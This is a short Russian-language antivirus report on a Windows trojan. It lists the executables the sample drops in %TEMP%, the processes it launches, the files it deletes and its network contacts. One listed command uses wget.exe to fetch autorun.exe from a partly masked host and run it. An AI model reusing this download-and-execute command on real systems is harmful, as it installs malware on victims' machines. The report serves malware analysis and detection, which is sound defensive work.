Техническая информация
Вредоносные функции:
Создает и запускает на исполнение:
- '%TEMP%\2.tmp\wget.exe' -P %HOMEPATH%\Local Settings\Temp http://pw#.a78.org/autorun.exe
- '%TEMP%\autorun.exe'
- '%TEMP%\library.exe'
- '%TEMP%\HLDSFake.exe'
- '%TEMP%\libraryx86.exe'
- '%TEMP%\autorun.exe' (загружен из сети Интернет)
Запускает на исполнение:
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\2.tmp\library.cmd" "
- '<SYSTEM32>\ping.exe' -n 4 ya.ru
- '<SYSTEM32>\taskkill.exe' /f /im HLDSFake.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\HLDSFake.cmd" "
- '<SYSTEM32>\ping.exe' -n 5 ya.ru
Изменения в файловой системе:
Создает следующие файлы:
- %TEMP%\2.tmp\library.cmd
- %TEMP%\2.tmp\wget.exe
- %TEMP%\autorun.exe
- %TEMP%\library.exe
- %TEMP%\libraryx86.exe
- %TEMP%\HLDSFake.exe
- %TEMP%\1.tmp\HLDSFake.cmd
Удаляет следующие файлы:
- %TEMP%\2.tmp\wget.exe
- %TEMP%\2.tmp\library.cmd
- %TEMP%\library.exe
- %TEMP%\HLDSFake.exe
Сетевая активность:
Подключается к:
- 'pw#.a78.org':80
TCP:
Запросы HTTP GET:
- pw#.a78.org/autorun.exe
UDP:
- DNS ASK pw#.a78.org
- DNS ASK ya.ru
Другое:
Ищет следующие окна:
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
